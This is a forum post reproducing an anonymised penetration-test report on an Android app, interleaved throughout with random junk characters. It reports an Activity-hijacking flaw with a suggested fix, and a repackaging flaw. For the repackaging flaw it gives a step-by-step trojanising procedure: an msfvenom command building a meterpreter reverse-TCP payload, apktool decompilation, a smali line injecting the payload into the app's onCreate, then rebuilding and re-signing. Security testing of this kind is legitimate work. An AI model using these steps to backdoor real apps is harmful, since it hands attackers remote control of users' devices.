原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

admin · 发表于 2022-6-8 20:32:44

' n1 h' c9 R1 z . v$ U2 O+ f% D, T3 M
" V# J, M9 |5 Z" h0 Q - h |' _) {1 S0 t

3 b8 ], T5 K" T2 M% c% _6 c, V 1 j$ a% ?* y7 r 文档编号： 9 t' L1 w* M# U$ C+ _+ |+ O6 Q6 m& A# B1 {

. Q1 n8 L' }3 M9 I ! z- Q% Q$ O! q9 B+ s2 ?- T 3 n/ }* F0 v" A* W % B6 c2 O7 N0 k' ~6 p

6 ~( ]9 d, g# N6 p" D4 T* t 9 |7 T+ W, r5 s& R# }0 \ % m8 _' y: F; k( I/ X 9 s9 C+ m7 f6 M4 Z- H& Q4 L7 w! L

# e, [' Q7 Z' d# ]/ M' d$ a # b& b* H3 Q" Y1 e1 m 9 F! T, O* s6 O, b , @0 J, m$ f* H

: H4 n: d, P5 b) o6 }5 f$ {2 |; o 1 c$ r4 ?+ P# }- \+ a " D# p( f/ `7 o/ v" d

D2 s3 F; K3 t+ c2 t6 Y1 e, `! k6 N* Z) H, }- K - ^1 s) e6 N" O9 d8 j + w8 d! m# ?# c. k& J T8 w

3 s- @/ _, V# k; [' W! k , [8 v y; i4 N* v' c 某某某APP渗透测试 " [/ l0 P# j& g" k: l ( J) _6 n" X s

# |3 y# W9 g9 k: K+ b 5 t% i( V8 E! W6 v ( W* y* j' N F- _7 X 4 h: G, o1 f9 v

3 X# |. x4 M6 p/ S' R1 N6 L 0 A$ U: n$ f. ~# B. W ! L8 o3 O6 G6 N+ e! M [# } " N' g m& B4 k- Y$ r2 ]

! E0 m' V8 S$ s. T9 p% Y6 y) R : [6 `5 i; Q4 c) t7 J / h0 Z4 w. F3 a# h I . {: p8 v' I/ I" q6 ?7 O0 b

8 b* t7 B; z4 c; ^$ d: ^ 1 i& Q# t" w- |1 w" P) Y2 U* [ # c6 u5 ^( X, I* _ $ [" v7 G& i3 ?3 |, L1 j5 X

+ F. R) C/ @( k6 `, b. l% C 4 T6 H: i6 Y4 h/ V 技术报告 + c" ^+ v/ n$ E+ f- G 9 S8 w' K" R+ u ?) G6 q

w2 J4 E9 J' B R2 F 3 E' x! M( }1 D7 o2 A# Q 2 p( y" z$ a- K& r' b* A 3 ?5 f' M& x5 o, {3 d% S! V

( [" p0 n! v3 _$ R1 U$ p" A : f# q5 q6 o7 A / o8 I# @, l. _8 n ; K5 J4 V$ D' }! i

$ |; U6 v! P3 b* `* \% P 9 c2 Q0 [# S7 t' T6 l ( V; h7 n. u2 s - L8 B6 f+ w3 f! f4 x0 N

2 M8 Q/ D3 v+ d ' g/ R8 X& R% w8 W2 t 4 k( D2 D" K+ z7 Q( v& |- l0 D2 D1 n) D. R D6 B

$ x% q, H; i$ Y- B, x) R% f ( T1 h9 p8 @! s' H: P 5 M8 R5 c. w8 d $ E; u2 E; a% F

* P6 }& C M; U7 m! [$ J- T6 u/ u 7 |8 X; L& x# X' n8 g' V% s c + ~% R* U4 j& Q- l3 E+ T) r& K$ |2 k. U% E; L

- u. }8 t0 z# h # |( o3 s. d+ z+ E4 c- F0 | t & f, u) j5 ~5 a r: y r2 w : q- F) U; Y/ ] u0 y8 t1 E

1 _, [* K5 r0 s 4 h& G+ n2 h8 B0 B+ {# i3 |- t 1 @ {: f: d* g- H1 V" m " C! z& z( P. O3 w c

4 h7 s8 ?* `; l/ `/ _8 E' S / N* c, r" ]) _, e$ y( T 4 E. R6 Y7 T2 n" x. [6 c! H' r# O- l8 X+ P6 L8 h1 T

0 W' ]3 G0 r: q9 } O8 p0 E- G 7 a8 Y7 D4 j6 U9 @) G. {7 h 6 H; Q7 e* y$ b, Y2 t# T1 R 5 }+ p* L% u5 R6 A7 u

: e0 d& h4 z" i6 R& J ( M B( Z A' Q; H ( z! c; s/ y9 Y5 c9 }6 I5 Z! v 8 |$ b( e0 b% O, P |

" y4 K$ h% w8 i) j1 g& y1 I # l l) G$ f( ? ) X2 M) n( f+ {( s- r0 U8 B% h& r) ^$ q2 X( X* w# n9 c

9 @) Y" C6 k# R6 q/ D' m * C) w/ u9 D a1 X% A7 { ! c: g) G1 r p& d" l! ]/ H, e. m( [ - }5 b( K: t9 i6 n

, _* D- W: }1 M# f3 N" [2 } _6 s( T/ r. G! W, W ! |9 Y1 N( P/ F& a ' A1 h* l2 z5 N' V- n3 p

' Z8 @" e) [1 B8 e: U 8 G8 q" j1 _8 }. Q9 Z- f. g8 t / q. r) E5 D) v$ H! V ' n+ f2 {5 y, ]% V: B) S- v

, q. g$ Z; r' ~7 z6 y: D / J6 _" W, N) M$ v- A' t/ i, j % `' M7 ~% c2 P' p; X 9 g) G4 A$ k( b# e0 s9 [

( A2 [4 b0 ^4 ]7 Y5 p+ _9 E( I& t) w4 P* W) g ' o) g# T9 x e; F 7 d4 T5 F) y. ]5 y; D

" Q H( ]8 i+ D 5 h/ J1 r# x3 [! u1 d% r D$ C& Y/ V. z6 j1 p k : k3 v6 d2 B" V% D- T

7 f1 C/ J! Q7 ?5 @. F7 H) |) d: O+ J' v9 y6 F5 U R! [ 二〇二〇年 7 v( {5 t! y4 j! L # ?* B1 W( c9 l) W+ q/ Z/ Q$ s

+ r# Z7 e5 ?2 R+ h; z1 Y: g: Y X8 |1 I : p$ {# R" ~$ i1 k% w 目录 3 u! g+ L b# w; K- ?' F/ [ 1 R8 j( ?7 |8 t! B/ H1 @. O: b0 Q

1 P0 v7 a, e. y7 s: T ; I4 d3 C' q- O/ x5 X8 y " X* U4 ]1 g: G / x/ r' o5 w( r9 u7 N

% k" L0 B [8 L# s0 h1 W* i2 ^1 x: Q* O3 o3 V 1 概述... 3 1 V' ^2 \, b: x! C1 _- G: F & ~& Z1 k7 @- M2 H

( r3 x3 j7 Z8 N$ y7 ~. i) w2 i ; z8 z; S7 F$ w2 I$ _% b 1.2测试时间... 3 ; G3 k4 ]' J/ a7 k ! D. L1 n1 ]0 i$ }' v( }) m+ C

; w* J% ~7 [2 Z# A2 j- I 0 A: E$ B' o( V: P: V 1.3测试对象... 3 $ |* `9 a f" N+ A. E& X4 m ' W: V8 c3 P3 i; K9 f# B

0 H' B1 K) m* b, G( D 7 O; H0 {; C% i( r" f0 T" q! t 1.4测试结果... 3 $ x9 B3 S/ g/ r' V4 k9 w- }- [+ ^ W) I$ M

) s8 @* O6 P ~ ' q: |6 y7 H- | }% Q! U3 { 2 检测结果... 4 & Y% L; S- l7 t' z' v% v: q! G9 O: T: V' P+ s- Q5 C5 f

8 ?; @) d& \* L3 N, G7 ^ 2 H' J+ [' T& [! W 2.1 某某某... 4 ' n# `; f1 Y$ h. c" R& i + r/ u' w' E( { h

; X3 a9 U7 u- q0 v7 m. N( l 1 v( i) V1 C4 b6 e$ m 2.1.1检测目标... 4 ; t7 H) h2 l- C9 M- b8 ?7 ]* \7 R! S" q$ C

1 s: O0 X- Y( m0 B7 f( ]$ h& T, r/ N7 M 2.1.2检测结果... 4 . Z Z: a4 [/ c8 i# V ( |' n& a' M; ?# G

/ V, F* K3 [; k7 H7 r/ G9 d4 V; u 2 s2 g9 Y1 y z% p 2.1.2.1. 4 " G, H k$ T* W3 j8 M \/ ?; b; r2 s4 M

, T0 l2 u6 E3 J2 n V' W( [ 3 R9 J& w5 [' Q, h- w 2.1.2.2. 6 9 o. |& A$ F$ T* [7 y( w8 b% M ! |: S" q; U% S" r8 p

0 ]/ g1 P/ l4 W- p0 k. m 7 v0 ^0 _) J- s G2 d5 }- E ' A8 J0 m/ `3 o; w/ `, Y4 L / L1 u4 x8 W0 f2 C" \2 h2 [

r( T+ _; K2 ?6 r4 J% B. T3 B& e4 r/ b 1 概述 : N/ w; I: A" O " P1 v0 `2 d6 ~2 U+ _0 I$ P3 @6 G

! _" f6 I/ b) H# U+ i% C" }$ T, N7 C# B4 @$ P* ?+ \: X5 [ 1.2测试时间 ) A- p; \! J, ], ~! j* N, G! }& a. w! H0 u H3 d8 y/ P4 d

+ o. c* i2 }7 _! P/ Q3 G4 o3 m- E 8 W1 i# S- S: g 3 I/ U& [* u2 r1 z2 \ 6 B' F$ k$ E B* V o$ E 渗透测试时间 " e& f" m$ b' A4 } ' w6 z, g }" v( O; o # s9 \|3 N* B8 d/ J+ C , I. Y7 i7 k) i* m/ \6 ]
, \|1 O: ?( k; u' a, j" \| , g5 S% u" W& T6 @' M" J; j $ W4 P. _ D- H9 p3 K2 \' E 2 _+ P- j5 S6 i 起始时间 7 u x. z% }+ C, {: U' J" j* Q ! }- O) h. g& c, l6 h3 ~- N 5 I& Q/ M" \- P! B7 s% O7 o 7 m& Q6 r$ p& c2 z/ W	% ~5 {; n( [8 _9 a( I . A+ w5 H) J3 P2 a. a# w) \* L , Y) J% }# I: e/ `, H& I& G; O. x! O0 C: Z8 f; c 2020年4月6日 / V' O7 q) t% m/ Y% r , \|' G7 Z- \|7 f0 H) N ' c- Z# t4 S$ x$ c( a- M& j# R& c: o" ^% o( R5 f* Q' ^
+ z V$ b4 x* L0 _$ ~ / u$ [ b$ s. v3 o# G$ L 9 k) v. q4 f, h G6 T5 A- Y o1 `, j4 k B W2 E 结束时间 7 @, f0 l6 Z8 T4 \|* Z 2 y% u; P* W y4 P+ s. s" z % p* N/ @/ j6 ^# \|8 t2 T( B 3 \|1 i6 X G& }# o0 Z$ j	+ c4 m! G$ v3 \4 W . U% i' v! q/ L' C9 D 4 w0 w$ B* B3 p' f* m 0 m! H# c k% u0 `' b3 e 2020年4月9日 8 i. z7 M; F1 P0 K . C5 y1 d0 k( y 6 a( H2 H% z2 Y6 H! u5 A1 \( L' N( X7 @6 e7 y

5 N: |& W, |" P, `2 V * a7 Z$ Y$ k, t7 ` f 1.3测试对象 % J) ~- s" J% {$ [' ` * A2 h. Y- e$ q8 t0 u) ~

8 |: e( A( @; v) A7 T5 X+ H0 @6 U % @+ Z7 ?3 J2 O5 ~- v8 @ 此次测试目标为某某某安卓APP进行渗透性测试，APP存在安全漏洞数量如下表所示： 8 o3 s F: h1 Y4 A. |1 C" L ( o) a, f: j( D# W+ p

0 S/ B& t* e5 G. ?# e + v; H, w( ?2 z2 w' l 表1-1 检测对象 ' `! X) ~! N* k3 w, R6 V& w' \7 g; q

7 e- p* g% @. a# f& S- @+ Q6 D7 q2 D0 [% s- x$ \|: {% C 3 _( e8 g. F. f, u+ {7 N* H6 \ $ U- ^% E, ]/ j: A- a 序号 * g; h- W1 n' @1 ] 9 I3 I$ O1 f3 ]9 Q1 ~ % G2 u0 u0 L. \|3 P# G 9 r1 G0 B0 [% _! @' ?, Q	, _# o; Y1 W p# e+ S6 x * C- e, Y7 X& P8 n+ \ 0 K, @. m* l& I1 n6 O- t2 {7 }8 M 4 j* _9 f" d q# _, A# P 测试对象 % F4 I; [8 b1 x+ t) K+ A! r ' \' P; o; W3 A+ ?( J% p $ W$ M$ v$ U0 z, t" E ) J6 t2 k9 D9 G/ S5 g: J" q% a" w$ _! s	9 S! o; _+ V5 t$ @ 5 o; t) f3 x* S: r4 R& K) S 2 w" a/ g7 U4 j 5 x6 V# B$ \|4 R; g% p! E. Q2 S. I 测试地址 + B8 S& z4 \|6 G# W ! d, ~- w# B* h3 }! F _ 7 E2 y! x; q, w2 ^1 d! J2 ~: H 1 {" J0 t% R' z& U9 o	% R, _" Z- K6 S" T) S $ z. d0 g7 O, X* V8 a( j( o 9 h0 d" j3 e5 \' P ) m* I0 \* G1 ]; I, ` 安全漏洞 8 E( T$ G x% y3 P w, L% ^9 g4 R 6 A4 e3 e' X! d) s ! R3 T9 ^- F: i+ m# ~ 7 U' r5 ~* F5 E& h& }5 S
3 D- o1 {2 _& g- j0 N* W4 W G# p: e 1 C1 u) {0 D) _2 I M( b* B ! a. B+ d- m) l2 ]/ G* W5 [# {! {, z. b/ {+ X+ s. w& v/ {4 u 1 ! p2 c {9 G! T6 ]+ X2 K: K( Z$ T8 }% U 5 [9 a b0 _: [" ~ I 4 S/ ?) \|% z0 V O5 b& u: }* u	) b, \|5 R- y% F: o+ g, X7 P 2 E( Z+ U# y: } a* `' x " q" n/ l9 W/ ~+ E* ^; i7 G & U5 d" ~3 q8 L1 W6 Z 某某某安卓APP ! t; K4 a# Y: O! P* x$ N/ x; A: K + G3 {, e$ v# N4 O% m / X' p. s! U( I ! g9 h6 c9 S1 C' [& q% o- S	6 \|: w( e+ [* ^9 x' Z6 U/ X# Q6 W, n . J( \|% Q9 T" F: X: f a8 M6 V: p6 Z " Z2 f4 h" p& m. [+ ^* ]5 \% x & H4 x6 X) b5 Q8 U Y* x( y6 L & J0 w5 F q8 G 4 u# g! F) L. f' ~6 r+ d 7 p: l6 l# k- O( e	, K$ t' D4 q& V9 M& \| 8 T' d' K2 I2 g * u. s# b T T, W, u, w2 \ , h ]+ U: b% _ 2 # {) `& J) M2 u, I# A5 k . a% m% D1 u4 M' [0 m, q ! j. B( _, R) v! Y( t; A9 [ ' f2 P, r' [: V; h7 B; i

- {$ J0 |; c' @1 x( A& j) ] 1 o& z' p/ e' F8 Q8 s) c) A$ ~ 1.4测试结果 ) x; a* l+ u2 a 6 e1 `: m D# l' t

K4 C7 w0 s: ~" J6 A0 B9 f+ ? 0 S" Q" z9 B0 }# ~+ M( s9 ^ 在本次对某某某APP透测试中发现，APP安全防护存在一定问题，主要问题如下所示： # F% a( H @5 a# D, e7 f% G ; G8 V! Y7 v( \- J: k

9 |/ p# n8 W8 o$ p8 U. I 3 s& D9 ]- m- u6 S) T0 y 7 r" D% x3 r1 ~' {3 v$ z: K4 ? 8 P) z& u7 |3 h$ E* \2 E

2 ~' ^! r. \1 W' }4 g + H: n0 a3 J2 m$ p ` 序号 3 T. J1 K, \% w0 u# f8 F3 F' J4 t

' u& l* `# X$ p, y# u8 t% B 8 t4 T6 J& T3 I- b; S9 s 系统名称 $ g: C1 K+ Y3 G0 ~) Q ; r( Z/ Y8 u% w. L8 D0 L- b

! c+ g* A! S: M : D) m6 H) S" y$ K l5 M4 `3 m 漏洞名称 , L7 ^" J3 o# R / Y2 w2 T8 I& C9 }# c) V4 ~

. f9 G: M [+ C5 F0 ` 7 L+ J5 ~& T' u6 I 漏洞危害 2 u" J7 J# |2 K# _% a ( n+ a' f9 j0 A

6 o' w% D' ^ t/ T4 n+ C2 l8 V9 q* I( O6 {& i 修复结果 t6 z N' d; @6 t" d$ P 7 @! r# }3 E7 P

; I# {* C/ G v3 ^4 S6 S" r: y ' _0 q. T+ B F 1 w1 Z1 {- y! @# S3 a: B/ _1 p ' b8 L X0 D6 j3 U8 K1 C$ z4 k9 [

# w+ F1 M! H* B6 L. H0 U9 g4 v % [; {+ X: T2 E* X6 h$ {7 g 某某某某某某APP ; `3 m5 _8 @/ o, j" Z/ K) ` i: Y, Q: { n$ X) h6 ?9 i4 n7 L

4 q6 F& S0 ^" `5 a( J ! U4 q+ \. _0 }( m/ n; X Activity 劫持 % v* \2 z9 u. @" E6 y% n % `1 j6 O1 K+ W; T

3 U) G2 v' E$ ^/ G8 W2 {; e5 q6 i# ]. v, ]" v( |8 K; p - M9 e% Y7 A+ D) A- f. K% C' s2 q( ]/ R4 h

$ w# i4 r+ L6 P' w5 h 2 }3 Y/ s7 q7 }5 y( b! V1 L. O 高 3 c6 e: y! a2 p( U: K* @3 i 5 A* g& _0 e6 v" e$ E4 k$ I) t- V7 }

5 e, U1 I4 v( y8 Z" H 0 r+ ^6 N9 J3 @6 G9 s# n 8 h: w7 O# {; J0 Q+ m) l& I( }7 e) G: |

& h5 q: U8 [/ X5 P 8 G& h9 e9 s% t3 K7 ? 2 ) g3 T5 U8 ~4 ~7 C * [1 n' X) K* ]

+ j, _3 @( z6 |" ~) m% f - q0 G1 Q9 \$ R) v 某某某某某某APP ' z1 f9 ?. K: {1 N" s& u0 Y 0 Z5 U& n) ^" R/ j8 u( J

; g: D2 H* |4 p( D4 U % l% T# f3 s: A" S 反编译二次打包捆绑木马、篡改APP代码 ! r: g0 |9 a' o" p9 n 1 c# c6 z1 k9 |8 T* l

( ]. m7 R+ r8 @' d 2 v+ z. f0 w2 p 高 2 [! p# X; F5 b6 x7 a; u" i$ }+ [' H7 Q0 L3 Y

! {) t' V+ j F6 M5 K% V . \0 A. w4 O5 K7 f" f. U) q ( `$ s3 }+ a- C7 T8 O5 T! H 0 P9 p& A9 P# F* m L! d) u

) v& F- O( n/ S+ r! s; h) g ) q4 A% \& J( I1 C8 f$ U* ? % r" B( w" X% n # S1 X9 j/ {& V+ w6 }3 h

w' l3 Z7 S5 r# y0 u : n; c- Z) [" u4 i4 K% h6 E 表1-2 测试结果 4 h6 w- ]; U- U; m# c ; l% X7 U" ^1 |/ y

' w, Z9 ~* ~8 j6 q) A % R( I& s/ m! v* b7 g5 L ; s3 r& }3 q6 X# R2 s 7 n3 @6 s9 a9 \3 s+ @- @2 J

9 i/ M' p% H# T$ T3 ?5 x) I/ |0 ` n 9 R- |$ g+ I8 M( y" x# Y 2 检测结果 , z- D$ M9 L6 `1 C 3 W6 m- l1 Z/ S# p+ ?

9 ]. T' X# T/ A( y: U8 e/ q- R. T + x9 @/ Q3 I$ H7 N5 b+ b! Y 2.1 某某某 ) c) Y! d4 A3 i \0 h0 D 8 x/ F9 t7 B I/ g9 Z8 c

2 z2 d% K( n" f F: q ( z9 c( {8 \: B- P' v; j1 D0 t, [ 2.1.1检测目标 6 r) b; `9 w$ q2 p7 R; N3 R! O 0 c, O& G+ b) w( H) O6 z9 k

0 }! H4 g/ c4 O0 A7 L % @6 X$ `, m$ l+ e# C" @; T. m) G* ? 目标地址： 某某某某某某APP ) O. q6 ~' v; l. E( n ( E# D: V4 f4 W" d5 e( w5 N$ K

' n5 [2 _7 n" \ $ u" P7 Z. g: _* b/ ^ 2.1.2检测结果 9 ]8 W/ q- b+ c0 O0 n! [9 z3 D9 {5 B" s

; |/ O' i) `, U" p8 h: z. M6 |. f$ r 2.1.2.1 7 y: y }9 D% h- _3 T% v" i" P: g5 R2 t5 y; }

1 M' m5 G; ^& i' w$ N/ |- ^ ' Z. W$ \9 J" B; O( r4 [; J1 P 漏洞链接地址：某某某某某某APP 0 w4 _# d. A( ?% T6 w" ]/ ` 7 J5 e) q+ t2 b/ ^6 h, V

) }" L8 }0 z8 _9 T/ O ) f4 d1 f$ z/ p1 v) g1 J ! e+ }; g$ C0 R8 i4 f z: z1 G+ z5 u; D: y

; P7 i& \1 z3 u( p0 o 1 } l8 G0 a9 J5 {$ P: d" H 漏洞分析及取证： ! P! H- i/ B) W! ?- j1 u$ f - G4 T, \/ j1 J1 h( c

$ i/ b9 ?3 q6 M2 M 5 C1 x# U% N5 A: m& P 通过androidkiiler反编译，发现app未进行安全加固， Activity 为com.minivision.cmcc.activity.SubActivity可被劫持，复现漏洞如图： & H. v; H- N' E% B: y2 ? ) v6 X. x: k$ H' h: L

, T6 Q& b$ x+ m( [# O# m' B. ^$ l7 I( [. X0 n7 m( ` % F4 F/ M" D! t1 }6 H4 G% E0 s, g $ {; V b4 ]' g* [. \+ _

5 {5 L! L0 o& D8 w " v. X0 {) {. a) A & {0 `0 F4 \/ y $ J, Z( s F# {8 L% d

8 X. @! z# w6 v0 L; B + @! k4 e4 s, M' d' D' ] # r0 z T* Y' u4 B1 \, m' F' r / g6 n4 r; y* p, k0 k2 X: V+ b) ]. j1 u

" J$ ~* R. A9 N6 R! B6 A7 u / Q8 X% W. Z3 l& v5 k 5 T% w- X" t$ S4 o g) z" Y% }: e! {: F1 G

- N2 S( r6 P9 [. Z3 p , j! e4 c: @% s# x+ q$ U + b$ G* k% i! C- B$ s- P5 Y1 _+ h, e4 x' V& y

. V2 S, z0 x% [# u1 ] % F# s& l$ X. M3 q8 o; T# a6 t& H 漏洞危害：高 * q8 d9 y! K: M3 M7 w9 p: n 9 K8 B! w! G: o5 }

& {. x: M2 Q9 I% }. P$ S7 o& x* l# x ! V/ k6 j; }) z3 X+ \|' O 8 ~- M9 S7 W- S a$ C8 G. g 严重程度 3 N d" G v6 J( \: K; m' ~2 `+ e; d ! X9 c& A6 `: `" u3 a , n1 Q# _, V4 q; g / d6 i3 T2 X9 [# p7 E$ t1 X2 O	! O# ^6 Y& L6 c; V0 j# q$ _/ l8 ^ 3 p0 o* z3 B8 T" B% y/ O. J9 U% i# L 4 L- f w( I" W& p2 i( ^" x 2 z) N# {* c( O& J- z0 e( U0 z 高 ' r0 c& [0 a8 k6 u7 K+ ? # y* K, X/ _9 [1 t$ U5 ?( Q ^, e+ ?9 H" f+ \9 \|+ ?( H7 {- S2 c J	% j: A( d* y' U d ]/ W3 O ( {6 C# y6 j( b8 q$ u3 N 1 e, K# e' G+ y# T' d & K" z- i/ ?2 B* x ■ , A* [& l. A& ?, Z : o% q) i" K+ E+ E7 _. T& a7 S" f 8 G8 O+ e8 j+ g$ Y' M* D5 I. A" F	: o* n/ h5 k3 w, g! B . ~3 W3 g! ]3 C3 O* X. T : Z( A8 c: c. _ 7 j/ E6 _5 `6 q7 l8 R# B% b, u 中 / y @5 B' }0 w: a7 d% q1 }! G $ N, U$ i' l9 v3 a - g& a. {9 F0 B! Z3 Y+ d8 i + {$ y" b2 ]. j	# m* m! Z% A h5 V* C$ F$ O 0 ~- q1 r2 Z. W5 z8 k8 E - O" P5 W7 }9 [6 g 8 n7 E: l. w+ z0 v: s# m # p+ d+ X8 s( H+ L; n, J ( J* f+ A; @3 ]6 j- L8 r. i : d1 f0 Q; q! x9 a2 L1 k! n; J. d' L N	8 W) l! M8 E0 v. C; J4 l! w4 c; v5 c9 D1 Z) o' J; X {2 A+ x6 ?" v2 f& W+ I* K8 g" X7 i 低 8 c* h: p- e* R/ W) ^) H' u5 K 8 ^9 D+ o2 R2 j% b: b* }" G R6 b/ b _3 ]$ ?: c _( O ! t- }. A! D' M l7 V4 k; t. R	0 ~5 G" R4 O: k4 T7 J2 J8 P3 \|$ ~7 v0 X { c $ H% O) ^# e4 K2 w) m4 A 5 @' q- _/ G/ A; r C 2 Z/ U( ^9 P c ) I: D* U" b v: q & n& y0 x" J0 k6 p; Z# A( f" i: L: u, r/ P

: e% S9 d; e7 m+ d. ]1 p: G' _ 9 L- Y2 c2 d5 y5 A( B% d% t9 I 6 z3 O* T: ]! _% j : m* b* ]/ K: W1 Y X* T

" y( H/ l8 A) g8 A 5 j3 k" l$ ~* j! Q; q. R 修复方法：在 APP 的 Activity 界面（也就是 MainActivity）中重写 onKeyDown 方法和 onPause 方法，当其被覆盖时，就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的（触摸返回键或 HOME 键），如果是用户自己触发的则无需弹出警示，否则弹出警示信息。 , o+ b/ ~: [% R, ^) q5 w# L8 ]* T& }4 |

- x( f+ O- C. _5 [" y1 e) l 6 t3 l7 X( y3 N, E7 p : {1 _4 I# A" ]$ N! F: h ( {0 }/ \; i" ~' G$ n

. B- r8 Y$ [* d' t5 y% r7 R( t3 k& t# y* X8 X5 h# w! L $ j7 ^( l2 O, q& Y , K( z4 E, z5 t

$ A# Q. Y' _5 x% \ + G( U0 ?; B5 x; f 2.1.2.2 $ B9 J4 Z6 v8 d6 m" B- m3 L* K3 i v2 Y+ ^6 d9 R* P

2 W5 P) ^6 {9 b( t% d * t. L* |+ T% n& a4 Z) x( e 漏洞链接地址：某某某某某某APP 2 h" n% g% p3 `9 ?, {5 f ; S6 B1 O" s0 a# L) p/ k

7 w% e- \. K* i% ]. }9 x0 D! H& x3 C" x3 Y; ?( L5 S9 t 漏洞分析及取证： 0 u; z4 L+ p2 ]8 n3 a; l% i8 l & c) \0 E7 n: J; B b

. J+ F& ]$ _5 t# H: f4 Y ! s# A" ^- d" r* x 通过反编译，发现程序未加壳加密，可直接反编译获取源码，经过测试可修改app代码捆绑木马或者植入广告等操作，复现详细方法如下： - E; p; [8 q0 Q1 x6 n: q4 K $ y: @2 N0 a; K* N0 \

) U1 j0 { z: H. ~' ~ @2 i ! g- e9 y! W) u' w- K& @& X 用Metasploit 生成木马 apk 8 O1 x& z' h4 H4 j' V$ ? : g k% j t) `2 F/ ]7 F2 |

( \, L/ X" f& W % S6 y3 y3 R, F+ ?) K msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk W; ]1 m, m% B5 I " J4 w9 j+ l1 _" I

5 ?, C3 Z+ a% M6 G' k+ t& u7 M ( _, \9 Y F9 L( b( w% Y 反编译目标apk和木马apk + j+ Q. q/ p, z" r a) h- z, u' K. X8 v6 h1 c1 H- ?

* p1 s2 k, ?' b2 i7 O! B5 Z5 f4 F7 t3 v6 x+ [- w# M$ W n+ h apktool d target.apk
2 d# z% u# P: M& H4 d # {! Q( n% U7 l apktool d cockhorse.apk ( b0 T# k( V- i, d6 J 8 P# @& A, y) U7 {. Y

b- x' n0 F. w# o& T" O6 ?' r 7 T+ | M5 `: W" y 木马 apk 注入目标 apk 9 }) `% d7 p0 Z% u0 _" K O; I2 V$ A0 x+ m: l

+ N s, I# _ r# M% _* a ' m" N9 U5 A) b9 A/ _ H 在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件，并在 onCreate()方法中添加如下代码：
# k+ D9 V% u* C" |. u8 K 7 ^+ Z4 o6 F t7 ?- {4 F0 f8 ^# A invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V 4 d- B5 X+ [- V) b5 F+ S 0 U1 l1 M Z4 v1 D

/ {. G9 R* x8 D + C' }3 U8 ~# K- S 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中，去除重复 " L, r2 {1 v+ @$ B" w 7 f6 C# n' j: r. {$ r$ i* n

) A( s. P4 h( O8 _) U d' {& m5 k9 X 将木马文件的 smali 文件放到目标文件下，例如 com/metasploit 文件复制到目标文件 com/ 下 % X, \) ]- U# b6 t ]9 z- |3 v! W6 E9 ]' K3 B

* ^- _2 I& k# x& p' P& F5 a7 }) E4 w- R; y8 z) I6 q 回编译生成最终 apk 7 C7 ^- \. n% L" g; X; G: k) _+ s, j1 _

# P0 E. x7 p5 Z. n ! K3 I [; _( N+ w8 m2 Y2 [; m1 c 重新打包 * N2 h1 I- m9 U 9 w+ C+ h4 w; P! X

L& ^% T5 H. p: U; q0 _& u! h9 L4 R1 V) X6 }! c9 S$ z' C4 J apktool b -o repackage.apk target_app_floder ; i' i( v% ]/ T p1 i# ~ / x( h+ N0 y( t. I* c3 u: ]

+ G1 O3 G& N; D 8 q& u9 z' d1 H g) D( w 创建签名文件，有的话可忽略此步骤 " J5 J2 M, x- F+ E3 P, j0 f3 S . G: w, X ?* a# ~6 F

) o9 K7 J( C9 Q. F$ e; u& y 3 n/ F* ]: v1 A1 d keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000 , A: H y3 ^; Y $ p7 h1 l9 ^1 F ^: |5 T

( H$ R) u7 C, _) p, E& F. h g. Z! }0 F8 i% q 签名，以下任选其一 * j( ]- G* C+ a6 c1 i( T* y4 [; o8 x+ f2 e- c* P; ~ C4 [, b

1 X/ U) f6 j: l9 e& m4 K 5 [9 {$ l& h; o' f c! \4 t% { jarsigner 方式 0 _8 W% v, x7 _ $ o; b& c1 k7 t2 A) m

7 R5 V- E, k$ U3 g# P4 z2 Q6 ]7 z5 o . j+ O0 @1 C& T8 }# T* k8 Q& z jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname 8 M( \2 x2 D* I( c" y # p1 ^2 M7 M- V/ q! q' A% i6 E

; ]: ]* K+ M1 I ; O+ C; p0 S! i apksigner 方式 ) W/ d$ t$ |, _ # q" O5 k8 q# H- R8 V

* D* i2 K* y! |, N * C0 r3 n! A( N# ?+ g apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk ) N. n: C# f+ ~2 b& I # f% `) ], f4 \1 R1 J. v6 r

# Q* n9 e8 }4 u3 E; }; X. l( A3 y9 ?! w- ^! e1 ~ 如需要禁用 v2签名 添加选项--v2-signing-enabled false r) D* Q ?6 L/ n* Z0 X : q) s) @% _+ _5 X( r* W. d

' ^' P, }. y$ U3 `4 ^5 Y3 F9 c. n8 Q , F1 u2 k; S4 x 验证，以下任选其一 0 g. b! `8 Z: J# n! j" K / e( p. d1 a# S: T6 [5 v8 h

`3 `0 T* Z# S6 z" M5 P' s ! ^& {' E4 M- w; k jarsigner方式 $ }+ n! e J" u$ }+ J% x+ S6 Y3 r# W* `6 @

# f! L: F5 t8 b" f& V! j' ] 9 t3 G# D8 s6 ~$ |7 @ jarsigner -verify repackaged.apk ; \7 G( _! r _. P6 r L! A ; L# N5 ]' I- [/ Y* U

" e. d, T' `6 _6 s) U; g3 I2 U3 m6 Z% C: @: y9 p% m. s apksigner 方式 / ~8 b: i; w3 `1 r( ?8 c2 u * Y" J+ u0 T7 X9 `' d6 [" @

! z2 m# a% }: a2 h% m/ t _/ u% d- |+ _ apksigner verify -v --print-certs repackaged.apk . a! Z2 }8 t. f; X! p5 z4 h! C" Z5 C D+ C9 z

* T- g+ ?; O% k6 @ 6 T ~- p5 u# Z' ` keytool方式 . \6 d6 i% T% q8 O$ T* x" I& ?. h7 A/ R

& ~& A: {+ T% P% H' I$ L1 I1 i # ]1 R* v9 z8 c keytool -printcert -jarfile repackaged.apk 7 h: B+ i0 S. t 1 h k! Q* H- i- {" C' d9 g' x

9 @# _# [; }$ ^ : F/ j- `# M) Z0 m- C- s6 T 对齐 * |/ }( w6 f! [* h! \5 p% ^ V) N6 {8 {& d; ^

- [" d- E3 \8 q , k$ i n1 a+ p! F 字节对齐优化 7 H7 i/ I1 b$ j) K7 y; b, M8 Z" c. J4 u ~9 p& S% s) B7 ?

